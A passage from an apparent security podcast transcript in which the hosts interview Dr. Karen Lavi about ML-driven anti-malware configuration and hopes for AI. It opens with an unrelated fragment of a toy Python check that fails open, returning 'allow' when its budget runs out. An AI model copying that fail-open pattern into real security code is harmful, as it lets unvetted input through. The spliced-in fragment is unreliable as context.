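    return "allow"       # budget exhausted: this toy example fails open

print(verdict({}, {}))   # 'block' in this illustrative run
```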

Nic Fillingham: Cool. What are you excited about? What's sort of coming down the pipe that is a tool or a technique or just an advancement in infrastructure that you think is going to allow you and your team to do so much more?

Dr. Karen Lavi: I think one thing that we're excited about, and we're currently building for our enterprise customers, is the ability to help them not just with the specific protection of the anti-malware product, but overall in the organization. Learn their organization, use the tools of AI and ML that we know how to use, and help them understand what is needed for their specific org. So, that's something that we are currently working on, and I'm very excited about that, because I think a lot of the struggle that we've been hearing from customers is like, "Awesome, you have this amazing new feature, but how do I know how much impact it will bring? And would it cause any harm to my employees?" And we are able to provide those answers to them and help them configure it in an automatic way.

Dr. Karen Lavi: I think one of the best analogies that we're using now is the self-driving car. We are learning how to drive the car for them and helping them to drive the car. They are now doing it and they're doing it pretty good, but there are sometimes unexpected things. We are able to predict those unexpected things and respond in a faster way because it's a machine and not a human, and we can provide that help to our customers.

Natalia Godyla: So Karen, it looks like you've done it all. Are you done with the journey now or is there something after this? What's the next big passion?

Dr. Karen Lavi: I think that we're just scratching the surface of what we can do, specifically with AI and machine learning in security. There is so much more that we can do to help our customers, to take the wheel for them and help them drive the car instead of just giving them the wheel. And that's what I'm excited about for the future, to dive more into that and bring more of those new capabilities to our customers.

Natalia Godyla: Is there anything in AI that you're really excited about for the future?

Dr. Karen Lavi: Well, there is something that I'm really looking forward that would be developed, which is our ability to build an AI that would replicate ourself. That I would be able to have a lot of mini Karens that would go to all of my meetings and write all the emails that I need to do so I can have time to do other stuff.

Natalia Godyla: Time to save the world a little bit more.

Nic Fillingham: Karen minions. And they all report back to you at the end of the day with all their progress. All right, well on that note, Dr. Karen Lavi, thank you so much for your time. It'll be great to talk to you again in the future about more things, AI, ML, and Security.

Dr. Karen Lavi: Thank you so much for inviting me.

Natalia Godyla: Well, we had a great time unlocking insights into security, from research to artificial intelligence. Keep an eye out for our next episode.

Nic Fillingham: And don't forget to tweet us @msftsecurity or email us at securityunlocked@microsoft.com with topics you'd like to hear covered on a future episode. Until then, stay safe.

Natalia Godyla: Stay secure.